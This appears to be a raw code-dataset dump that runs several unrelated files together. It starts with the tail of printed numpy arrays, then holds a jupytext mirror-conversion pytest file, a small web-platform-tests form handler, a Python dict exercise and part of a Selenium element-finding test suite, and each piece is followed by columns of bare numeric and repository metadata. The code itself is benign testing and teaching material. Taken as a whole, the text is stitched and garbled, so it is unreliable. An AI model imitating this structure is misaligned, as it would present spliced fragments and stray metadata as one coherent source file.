     array([[3, 5, 3, 0, 4, 5],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 3, 2, 4, 5],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 3, 0, 4, 5],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 3, 0, 0, 5],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 0, 0, 0, 5],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 0, 0, 0, 0],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 0, 0, 0, 0, 0],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 0, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 4, 4, 0, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 4, 4, 0, 0, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 4, 4, 0, 0, 0],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 3, 3, 3, 4, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 3, 3, 3, 0, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 0, 3, 3, 0, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 3, 3, 0, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 3, 0, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 3, 0, 5, 5, 3],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 3, 0, 5, 5, 3],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 3, 3, 5, 5, 3],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 3, 0, 5, 5, 3],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 3, 0, 5, 5, 3],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 3, 0, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 5, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 5, 5, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 5, 5, 5, 5, 5],
            [4, 4, 4, 4, 4, 4]]),
     array([[2, 5, 5, 5, 5, 5],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 5, 5, 5, 5, 5],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 5, 5, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 5, 5, 5, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 0, 0, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 0, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 2, 0, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[2, 2, 0, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[2, 2, 3, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[2, 2, 3, 4, 4, 3],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 4, 4, 4, 4],
            [2, 2, 3, 4, 4, 3],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 2, 4, 4, 4, 4],
            [2, 2, 3, 4, 4, 3],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 2, 4, 4, 4, 4],
            [2, 2, 3, 4, 4, 3],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 2, 4, 4, 4, 4],
            [2, 2, 3, 4, 4, 3],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 4, 4, 4, 4],
            [2, 2, 3, 4, 4, 3],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[2, 2, 3, 4, 4, 3],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[2, 2, 3, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[2, 2, 0, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 2, 0, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 4, 4, 0],
            [5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 4, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 0, 4, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[5, 0, 0, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 2, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 4, 4, 4]]),
     array([[0, 3, 3, 3, 0, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 3, 3, 3, 2, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 3, 3, 3, 2, 5],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 3, 3, 3, 2, 5],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 2, 2, 2, 2],
            [4, 3, 3, 3, 2, 5],
            [4, 4, 4, 4, 4, 4]])]
| 27.60084
| 72
| 0.293956
| 1,480
| 6,569
| 1.30473
| 0.018919
| 0.600725
| 0.669601
| 0.66494
| 0.93682
| 0.935267
| 0.935267
| 0.935267
| 0.934749
| 0.933713
| 0
| 0.332284
| 0.371442
| 6,569
| 237
| 73
| 27.7173
| 0.135384
| 0.018572
| 0
| 0.934498
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004367
| 0
| 0.004367
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
6b0fa3c199ad3a4d5b9bb1849fa8519856329829
| 13,356
|
py
|
Python
|
tests/test_mirror.py
|
vmarceau/jupytext
|
799ea65b693a5f387fe37c9aebad463a97d1dd38
|
[
"MIT"
] | null | null | null |
tests/test_mirror.py
|
vmarceau/jupytext
|
799ea65b693a5f387fe37c9aebad463a97d1dd38
|
[
"MIT"
] | null | null | null |
tests/test_mirror.py
|
vmarceau/jupytext
|
799ea65b693a5f387fe37c9aebad463a97d1dd38
|
[
"MIT"
] | 1
|
2021-07-02T17:49:27.000Z
|
2021-07-02T17:49:27.000Z
|
"""Here we generate mirror representation of py, Rmd and ipynb files
as py or ipynb, and make sure that these representations minimally
change on new releases.
"""
import os
import pytest
from nbformat.v4.nbbase import new_notebook
from jupytext.compare import compare
import jupytext
from jupytext.compare import compare_notebooks, combine_inputs_with_outputs
from jupytext.formats import long_form_one_format
from jupytext.paired_paths import full_path
from .utils import list_notebooks, skip_if_dict_is_not_ordered, requires_pandoc, requires_sphinx_gallery
pytestmark = skip_if_dict_is_not_ordered
def create_mirror_file_if_missing(mirror_file, notebook, fmt):
if not os.path.isfile(mirror_file):
jupytext.write(notebook, mirror_file, fmt=fmt)
def test_create_mirror_file_if_missing(tmpdir, no_jupytext_version_number):
py_file = str(tmpdir.join('notebook.py'))
assert not os.path.isfile(py_file)
create_mirror_file_if_missing(py_file, new_notebook(), 'py')
assert os.path.isfile(py_file)
def assert_conversion_same_as_mirror(nb_file, fmt, mirror_name, compare_notebook=False):
dirname, basename = os.path.split(nb_file)
file_name, org_ext = os.path.splitext(basename)
fmt = long_form_one_format(fmt)
ext = fmt['extension']
mirror_file = os.path.join(dirname, '..', 'mirror', mirror_name, full_path(file_name, fmt))
notebook = jupytext.read(nb_file, fmt=fmt)
# it's better not to have Jupytext metadata in test notebooks:
if fmt == 'ipynb' and 'jupytext' in notebook.metadata: # pragma: no cover
notebook.metadata.pop('jupytext')
jupytext.write(nb_file, fmt=fmt)
create_mirror_file_if_missing(mirror_file, notebook, fmt)
# Compare the text representation of the two notebooks
if compare_notebook:
nb_mirror = jupytext.read(mirror_file)
compare(nb_mirror, notebook)
return
elif ext == '.ipynb':
notebook = jupytext.read(mirror_file)
fmt.update({'extension': org_ext})
actual = jupytext.writes(notebook, fmt)
with open(nb_file, encoding='utf-8') as fp:
expected = fp.read()
else:
actual = jupytext.writes(notebook, fmt)
with open(mirror_file, encoding='utf-8') as fp:
expected = fp.read()
if not actual.endswith('\n'):
actual = actual + '\n'
compare(expected, actual)
# Compare the two notebooks
if ext != '.ipynb':
notebook = jupytext.read(nb_file)
nb_mirror = jupytext.read(mirror_file, fmt=fmt)
if fmt.get('format_name') == 'sphinx':
nb_mirror.cells = nb_mirror.cells[1:]
for cell in notebook.cells:
cell.metadata = {}
for cell in nb_mirror.cells:
cell.metadata = {}
compare_notebooks(notebook, nb_mirror, fmt)
combine_inputs_with_outputs(nb_mirror, notebook)
compare_notebooks(notebook, nb_mirror, fmt, compare_outputs=True)
@pytest.mark.parametrize('nb_file', list_notebooks('julia') + list_notebooks('python') + list_notebooks('R'))
def test_script_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb', 'script_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_julia'))
def test_ipynb_to_julia(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'jl', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip='many hash'))
def test_ipynb_to_python(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip=''))
def test_ipynb_to_python_vim(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, {'extension': '.py', 'cell_markers': '{{{,}}}'},
'ipynb_to_script_vim_folding_markers')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip=''))
def test_ipynb_to_python_vscode(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, {'extension': '.py', 'cell_markers': 'region,endregion'},
'ipynb_to_script_vscode_folding_markers')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_R(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'R', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_r(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.low.r', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_m'))
def test_ipynb_to_m(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.m', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file,extension',
[(nb_file, extension)
for nb_file in list_notebooks('ipynb_scheme')
for extension in ('ss', 'scm')])
def test_ipynb_to_scheme(nb_file, extension, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, extension, 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_clojure'))
def test_ipynb_to_clojure(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'clj', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_bash'))
def test_ipynb_to_bash(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'sh', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_cpp'))
def test_ipynb_to_cpp(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'cpp', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_q'))
def test_ipynb_to_q(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'q', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_julia'))
def test_ipynb_to_julia_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'jl:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_m'))
def test_ipynb_to_m_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'm:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip=''))
def test_ipynb_to_python_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py'))
def test_ipynb_to_python_hydrogen(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py:hydrogen', 'ipynb_to_hydrogen')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_R_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'R:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_r_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.low.r:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_R_spin(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'R', 'ipynb_to_spin')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_r_spin(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.low.r', 'ipynb_to_spin')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_cpp'))
def test_ipynb_to_cpp_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'cpp:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file,extension',
[(nb_file, extension)
for nb_file in list_notebooks('ipynb_scheme')
for extension in ('ss', 'scm')])
def test_ipynb_to_scheme_percent(nb_file, extension, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file,
'{}:percent'.format(extension),
'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_clojure'))
def test_ipynb_to_clojure_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'clj:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_bash'))
def test_ipynb_to_bash_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'sh:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_q'))
def test_ipynb_to_q_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'q:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('percent'))
def test_percent_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:percent', 'script_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('hydrogen'))
def test_hydrogen_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:hydrogen', 'script_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('R_spin'))
def test_spin_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:spin', 'script_to_ipynb')
@requires_sphinx_gallery
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip='(raw|hash|frozen|magic|html|164|long)'))
def test_ipynb_to_python_sphinx(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py:sphinx', 'ipynb_to_sphinx')
@requires_sphinx_gallery
@pytest.mark.parametrize('nb_file', list_notebooks('sphinx'))
def test_sphinx_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:sphinx', 'sphinx_to_ipynb')
@requires_sphinx_gallery
@pytest.mark.parametrize('nb_file', list_notebooks('sphinx'))
def test_sphinx_md_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, {'extension': '.ipynb', 'format_name': 'sphinx', 'rst2md': True},
'sphinx-rst2md_to_ipynb', compare_notebook=True)
@pytest.mark.parametrize('nb_file', list_notebooks('md'))
def test_md_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb', 'md_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('Rmd'))
def test_Rmd_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb', 'Rmd_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_all', skip='Calysto|66'))
def test_ipynb_to_Rmd(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'Rmd', 'ipynb_to_Rmd')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_all', skip='Calysto'))
def test_ipynb_to_md(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'md', 'ipynb_to_md')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_idl'))
def test_ipynb_to_pro(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'pro', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_idl'))
def test_ipynb_to_pro_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'pro:percent', 'ipynb_to_percent')
@requires_pandoc
@pytest.mark.parametrize('nb_file',
list_notebooks('ipynb', skip='(functional|Notebook with|flavors|invalid)'))
def test_ipynb_to_pandoc(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'md:pandoc', 'ipynb_to_pandoc')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_js'))
def test_ipynb_to_js(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'js', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_js'))
def test_ipynb_to_js_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'js:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_ts'))
def test_ipynb_to_ts(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ts', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_ts'))
def test_ipynb_to_ts_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ts:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_scala'))
def test_ipynb_to_scala(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'scala', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_scala'))
def test_ipynb_to_scala_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'scala:percent', 'ipynb_to_percent')
| 41.222222
| 111
| 0.76183
| 1,936
| 13,356
| 4.792355
| 0.086777
| 0.09377
| 0.084285
| 0.114033
| 0.796185
| 0.762341
| 0.743587
| 0.731515
| 0.720629
| 0.689912
| 0
| 0.00094
| 0.123615
| 13,356
| 323
| 112
| 41.349845
| 0.791713
| 0.02351
| 0
| 0.229665
| 1
| 0
| 0.156845
| 0.01174
| 0
| 0
| 0
| 0
| 0.229665
| 1
| 0.229665
| false
| 0
| 0.043062
| 0
| 0.277512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b1c49a993bfa25ba6c39303880e8860fb3e1489
| 116
|
py
|
Python
|
xhr/resources/form.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 8
|
2019-04-09T21:13:05.000Z
|
2021-11-23T17:25:18.000Z
|
xhr/resources/form.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 21
|
2021-03-31T19:48:22.000Z
|
2022-03-12T00:24:53.000Z
|
xhr/resources/form.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 11
|
2019-04-12T01:20:16.000Z
|
2021-11-23T17:25:02.000Z
|
def main(request, response):
return "id:%s;value:%s;" % (request.POST.first("id"), request.POST.first("value"))
| 38.666667
| 86
| 0.655172
| 17
| 116
| 4.470588
| 0.588235
| 0.289474
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 116
| 2
| 87
| 58
| 0.730769
| 0
| 0
| 0
| 0
| 0
| 0.189655
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
8617975f1d304c69a623d427334d968da71b7293
| 233
|
py
|
Python
|
Week3/01. Dicts.py
|
HawkingLaugh/Data-Processing-Using-Python
|
6c4d7e09317aee41684731d5611f2f0dab217b2b
|
[
"MIT"
] | null | null | null |
Week3/01. Dicts.py
|
HawkingLaugh/Data-Processing-Using-Python
|
6c4d7e09317aee41684731d5611f2f0dab217b2b
|
[
"MIT"
] | null | null | null |
Week3/01. Dicts.py
|
HawkingLaugh/Data-Processing-Using-Python
|
6c4d7e09317aee41684731d5611f2f0dab217b2b
|
[
"MIT"
] | null | null | null |
aInfo = {'A':3000, 'B':2000, 'C':4500, 'D':8000}
Info = [('A',3000), ('B',2000), ('C',4500), ('D',8000)]
bInfo = dict(Info)
cInfo = dict([['A',3000], ['B',2000], ['C', 4500], ['D', 8000]])
dInfo = dict(A=3000, B=2000, C=4500, D=8000)
| 46.6
| 64
| 0.515021
| 41
| 233
| 2.926829
| 0.341463
| 0.166667
| 0.2
| 0.333333
| 0.733333
| 0.733333
| 0.733333
| 0.733333
| 0.4
| 0
| 0
| 0.312195
| 0.120172
| 233
| 5
| 65
| 46.6
| 0.273171
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
861a10692b95bf3b245b9db4b73b8b464b1bacb9
| 24,468
|
py
|
Python
|
py/test/selenium/webdriver/common/driver_element_finding_tests.py
|
sagarkasaram/venky
|
2d3a1476118ab6c89c9d3caa2eac9625b7c78207
|
[
"Apache-2.0"
] | 1
|
2019-06-08T23:01:50.000Z
|
2019-06-08T23:01:50.000Z
|
py/test/selenium/webdriver/common/driver_element_finding_tests.py
|
sagarkasaram/venky
|
2d3a1476118ab6c89c9d3caa2eac9625b7c78207
|
[
"Apache-2.0"
] | null | null | null |
py/test/selenium/webdriver/common/driver_element_finding_tests.py
|
sagarkasaram/venky
|
2d3a1476118ab6c89c9d3caa2eac9625b7c78207
|
[
"Apache-2.0"
] | 1
|
2019-06-18T18:03:16.000Z
|
2019-06-18T18:03:16.000Z
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.webdriver.common.by import By
from selenium.common.exceptions import (
InvalidElementStateException,
InvalidSelectorException,
NoSuchElementException,
NoSuchWindowException,
WebDriverException)
# By.id positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Id(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.ID, "linkId")
assert element.get_attribute("id") == "linkId"
def test_Should_Be_Able_To_Find_ASingle_Element_By_Numeric_Id(driver, pages):
pages.load("nestedElements.html")
element = driver.find_element(By.ID, "2")
assert element.get_attribute("id") == "2"
def test_should_be_able_to_find_an_element_with_css_escape(driver, pages):
pages.load("idElements.html")
element = driver.find_element(By.ID, "with.dots")
assert element.get_attribute("id") == "with.dots"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Id(driver, pages):
pages.load("nestedElements.html")
elements = driver.find_elements(By.ID, "test_id")
assert len(elements) == 2
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Numeric_Id(driver, pages):
pages.load("nestedElements.html")
elements = driver.find_elements(By.ID, "2")
assert len(elements) == 8
# By.id negative
def test_Should_Not_Be_Able_To_Locate_By_Id_ASingle_Element_That_Does_Not_Exist(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.ID, "non_Existent_Button")
def test_Should_Not_Be_Able_To_Locate_By_Id_Multiple_Elements_That_Do_Not_Exist(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.ID, "non_Existent_Button")
assert len(elements) == 0
@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Id_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.ID, "")
@pytest.mark.xfail_phantomjs(raises=NoSuchElementException)
def test_Finding_Multiple_Elements_By_Empty_Id_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.ID, "")
assert len(elements) == 0
def test_Finding_ASingle_Element_By_Id_With_Space_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.ID, "nonexistent button")
def test_Finding_Multiple_Elements_By_Id_With_Space_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.ID, "nonexistent button")
assert len(elements) == 0
# By.name positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Name(driver, pages):
pages.load("formPage.html")
element = driver.find_element(By.NAME, "checky")
assert element.get_attribute("value") == "furrfu"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Name(driver, pages):
pages.load("nestedElements.html")
elements = driver.find_elements(By.NAME, "checky")
assert len(elements) > 1
def test_Should_Be_Able_To_Find_An_Element_That_Does_Not_Support_The_Name_Property(driver, pages):
pages.load("nestedElements.html")
element = driver.find_element(By.NAME, "div1")
assert element.get_attribute("name") == "div1"
# By.name negative
def test_Should_Not_Be_Able_To_Locate_By_Name_ASingle_Element_That_Does_Not_Exist(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.NAME, "non_Existent_Button")
def test_Should_Not_Be_Able_To_Locate_By_Name_Multiple_Elements_That_Do_Not_Exist(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.NAME, "non_Existent_Button")
assert len(elements) == 0
